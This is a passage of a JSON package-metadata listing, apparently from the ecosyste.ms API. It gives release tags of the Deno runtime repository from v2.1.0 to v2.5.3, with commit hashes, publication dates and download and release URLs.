.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"